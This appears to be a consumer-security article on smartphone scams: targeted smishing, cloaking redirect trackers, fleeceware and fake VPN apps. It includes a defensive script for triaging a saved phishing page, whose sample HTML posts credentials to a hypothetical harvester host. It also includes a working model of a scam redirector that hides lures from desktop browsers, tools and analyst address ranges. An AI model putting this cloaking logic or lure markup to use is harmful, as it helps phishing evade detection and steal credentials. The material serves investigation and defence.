By some estimates, there are more smartphones on this planet than humans to use them. People who have never used a desktop computer use smartphones and other mobile devices every day and have much of their life tied to them, perhaps more than they should.
As a result, cyber scammers have shifted their approach from emailing gullible personal computer users (pretending to be Nigerian princes in need of banking assistance) and have instead set their sights on the easier target of mobile phone users. Criminals are using smartphone apps and text messages to lure vulnerable people into scams, some with purely financial consequences and others that put victims in actual physical danger.
I recently outlined some ways to apply a bit of armor to our digital lives, but recent trends in online scams have underscored how easily smartphones and their apps can turn against their users. These worst-case scenarios are worth reviewing to help others spot and avoid them, and we’re not just talking about helping older users with this. This affects everyone.
Personally, I have been contacted by a variety of people who have been victims of mobile-centric scams and people who have been exposed and attacked through unexpected vulnerabilities created by interactions with mobile applications. For some, these experiences have shattered their sense of privacy and security, and for others, these scams have cost thousands (or tens of thousands) of dollars. In light of this, it pays to arm yourself and your family with information and a lot of skepticism.
Targeted SMS Phishing
In the past two years there has been a huge increase in text message phishing scams that target personal data, especially website credentials and credit card details. Sometimes called "smishing", SMS phishing messages usually carry a call to action that pushes the recipient to click a link, one that typically leads to a web page built to steal usernames and passwords (or to do something worse). Unwanted text messages are nothing new, but they are becoming more and more targeted.
In 2020, the FTC reported that American consumers lost $86 million as a result of fraudulent text messages, and the FCC issued a warning about COVID-19 text scams. Sure, you are smart, and you would never hand over your personal details in response to an unsolicited text message. But what if the text mentions your name, along with enough correct information to worry you at least a little? Say, a text message supposedly from your bank, addressing you by name and asking you to log in to confirm or dispute a $500 charge on your credit card at Walmart?
That is the type of message I received recently. If I had not read the message carefully, noticed that it came from a phone number not connected to my bank, or remembered that I had never consented to any communication from my bank by text message, I could have clicked.
Instead, I went into my bank's mobile app and found a notice on the login page that customers were experiencing fraud attempts via text message. I took the link to my computer and downloaded the page using wget. The link pointed to a Google App Engine page that contained an IFRAME element pointing to a Russian website, one that tried to imitate the bank's login page.
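A page pulled down with wget can be triaged without rendering it: list every host the page loads content from or posts data to and compare them with the page's own host and the brand's real domain. The script below is an added example, not code from the original article. The HTML it parses is a constructed stand-in for a saved lure page, and every hostname in it (the appspot lure, the .ru harvester, the bank's CDN) is hypothetical.

```python
"""Triage a downloaded phishing page: list every off-site target it loads or posts to.

Added example, not code from the original article. The HTML below is a
constructed stand-in for a page saved with `wget`; all hostnames are hypothetical.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a lure page on one origin that embeds the real
# credential-harvesting form from another origin inside an IFRAME.
SAMPLE_PAGE_URL = "https://lure-example.appspot.com/verify"
SAMPLE_HTML = """
<html><body>
<h1>Confirm your recent activity</h1>
<iframe src="https://bank-login-example.ru/secure/login.php" width="100%"></iframe>
<script src="/static/app.js"></script>
<form action="https://bank-login-example.ru/secure/submit.php" method="post">
  <input name="user"><input name="pass" type="password">
</form>
<img src="https://cdn.real-bank-example.com/logo.png">
</body></html>
"""

# Attributes that make the browser fetch from, or send data to, another URL.
LOADING_ATTRS = {
    "iframe": "src", "frame": "src", "script": "src", "img": "src",
    "form": "action", "a": "href", "link": "href", "object": "data",
}


class TargetCollector(HTMLParser):
    """Collects (tag, absolute_url) for every loading/submitting attribute."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.targets = []

    def handle_starttag(self, tag, attrs):
        attr_name = LOADING_ATTRS.get(tag)
        if attr_name is None:
            return
        for name, value in attrs:
            if name == attr_name and value:
                # Relative URLs resolve against the page's own URL.
                self.targets.append((tag, urljoin(self.base_url, value)))


def offsite_targets(page_url, html, trusted_hosts=()):
    """Return targets whose host is neither the page's own nor a trusted host.

    trusted_hosts: hostnames the brand legitimately uses (e.g. the bank's real
    domain), so a hot-linked logo is not reported as suspicious.
    """
    parser = TargetCollector(page_url)
    parser.feed(html)
    own_host = urlsplit(page_url).hostname
    trusted = {h.lower() for h in trusted_hosts}
    flagged = []
    for tag, url in parser.targets:
        host = urlsplit(url).hostname
        if host is None or host == own_host or host.lower() in trusted:
            continue
        flagged.append((tag, url))
    return flagged


if __name__ == "__main__":
    for tag, url in offsite_targets(SAMPLE_PAGE_URL, SAMPLE_HTML,
                                    trusted_hosts=["cdn.real-bank-example.com"]):
        print(f"{tag:<6} -> {url}")
```

On the sample page this reports the IFRAME and the form action on the .ru host and stays quiet about the logo hot-linked from the bank's real CDN. Run it on a page saved with wget, passing the brand's real domains as trusted hosts; anything left in the output is where the credentials would actually go.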
SMS scams like these are made easy by the sheer volume of exposed personal data and by marketers' aggregation of it. All too often this data is collected in databases that are leaked or hacked. Scammers can target a large number of a specific brand's customers simply by joining a list of people who have a relationship with that company to their phone numbers. I don't have good scientific data on the prevalence of targeted smishing, but a random sample of family and friends indicates that it is not a temporary problem: in some cases it accounts for half of the daily SMS messages they receive.
Most of it is the equivalent of pop-up web ads. Some of the targeted SMS messages I have seen purport to come from common services, Netflix for example:
Netflix: [Name], update your membership with us to keep watching. [very sketchy URL]
The link led to a site that claimed my last payment had been declined and that I had 48 hours to reactivate my account.
Clicking that link sends you through a series of redirects run by a "tracker" site configured to filter out suspicious clicks (such as those from desktop browsers) and forward only mobile browsers to the intended destination, in this case a Netflix look-alike trying to get you to sign up as a member. Your IP address is one of the arguments passed to the final URL so that undesirable "client" address ranges can be screened out.
This is a low-grade scam, no doubt. But the same tracker sites are used by a wide range of scams, including "fake alert" pop-ups delivered by SMS and in mobile browsers. These scams almost always include an urgent call to action. Another frequent angle is a claim that the recipient's IP address is "being tracked due to viruses", with a link leading to an app store page, usually for some questionable virtual private network app that does nothing more than collect "in-app payments" through the Apple or Google app stores for a service that does not work. Or the service does work, but not in the way the device owner would like.
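The redirect filtering described above is easy to model, and modelling it shows why a quick check from a desktop browser or with curl tends to land on something harmless. The block below is an added example, not the article's code or any real tracker's: it reproduces the behaviour the article describes (only mobile user agents are forwarded, clicks that look like analysts or bots get a decoy, and the client IP is appended to the final URL). The landing and decoy URLs are hypothetical, and the blocked address ranges are documentation prefixes standing in for whatever ranges a real operator excludes.

```python
"""Model of the click-filtering "tracker" redirect described in the article.

Added example, not code from the article or from any real tracker. URLs are
hypothetical; the blocked ranges are RFC 5737 documentation prefixes used as
placeholders for the address space a scammer would screen out.
"""
import ipaddress
from urllib.parse import urlencode

LANDING_URL = "https://netflix-renewal-example.net/reactivate"   # hypothetical lure
DECOY_URL = "https://example.com/"                               # shown to filtered clicks

# Placeholder "undesirable client" ranges (TEST-NET-2 and TEST-NET-3), not real
# vendor or cloud ranges.
BLOCKED_NETWORKS = [
    ipaddress.ip_network("198.51.100.0/24"),
    ipaddress.ip_network("203.0.113.0/24"),
]

MOBILE_MARKERS = ("iphone", "ipad", "android", "mobile")
BOT_MARKERS = ("bot", "crawler", "spider", "wget", "curl", "python-requests")


def classify_user_agent(user_agent):
    """Return 'bot', 'mobile' or 'desktop' from a User-Agent string."""
    ua = user_agent.lower()
    if any(marker in ua for marker in BOT_MARKERS):
        return "bot"
    if any(marker in ua for marker in MOBILE_MARKERS):
        return "mobile"
    return "desktop"


def route_click(user_agent, client_ip):
    """Decide where a click goes, the way the cloaking redirector does.

    Returns the URL the tracker would redirect the client to.
    """
    try:
        ip = ipaddress.ip_address(client_ip)
    except ValueError:
        return DECOY_URL          # unparsable address: treat as hostile
    if any(ip in net for net in BLOCKED_NETWORKS):
        return DECOY_URL          # analyst / scanner address space
    if classify_user_agent(user_agent) != "mobile":
        return DECOY_URL          # desktop browsers and tools never see the lure
    # The final hop carries the client IP so the landing page can re-check it.
    return LANDING_URL + "?" + urlencode({"ip": str(ip)})


if __name__ == "__main__":
    # Constructed sample clicks: one real phone, one desktop, one tool, one
    # phone from a screened-out range.
    samples = [
        ("Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X)", "192.0.2.10"),
        ("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "192.0.2.10"),
        ("Wget/1.21", "192.0.2.10"),
        ("Mozilla/5.0 (Linux; Android 13) Mobile", "203.0.113.5"),
    ]
    for ua, ip in samples:
        print(f"{ua[:42]:<42} {ip:<14} -> {route_click(ua, ip)}")
```

The practical consequence for anyone investigating one of these links: fetch it with a mobile User-Agent string from an address the operator has no reason to exclude, or you will only ever see the decoy and conclude the link is harmless.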
Fleeceware apps and fake apps
Despite the app stores' efforts to vet applications before offering them for download, scam developers still manage to get nasty things into the iOS and Android markets: apps that are very cheap or "free", offer limited (or nonexistent) utility, and trick users into paying large amounts of money.
These apps are often presented as free but come with in-app payments, including subscription fees that kick in automatically after a very short "trial period" that may not be at all transparent to the user. Often referred to as "fleeceware", apps like this can charge whatever the developer wants, repeatedly. They can even keep charging after the user has uninstalled the app, because uninstalling an app does not cancel a store subscription; the subscription has to be cancelled separately in the App Store or Google Play subscription settings.
From time to time, outright malicious apps manage to get past app store review. When detected, the developer accounts associated with the apps are generally suspended, and the apps are removed from the stores and (usually) from the devices on which they were installed. But the developers of these apps often just switch to another developer account or find other ways to get their apps in front of users.
I followed a campaign of pop-up ads that led smartphone users to "security" apps in both app stores, using bogus alert pages that resemble mobile operating system alerts warning of virus infections on the device. When the ads detected an iOS device, they ended up opening the page for a VPN app from a developer in Belarus that charged $10 a week for the service. The app store listing was crammed with 4-star reviews (probably fake), along with some from real customers who had discovered they had been scammed.
The app itself worked, more or less: it directed all users’ internet traffic through a server in Belarus, allowing man-in-the-middle attacks and the collection of huge amounts of user data.
Sure, a sophisticated device user would know that these apps are fraudulent and detect them immediately, right? Possibly, but how many iOS and Android users have that level of sophistication?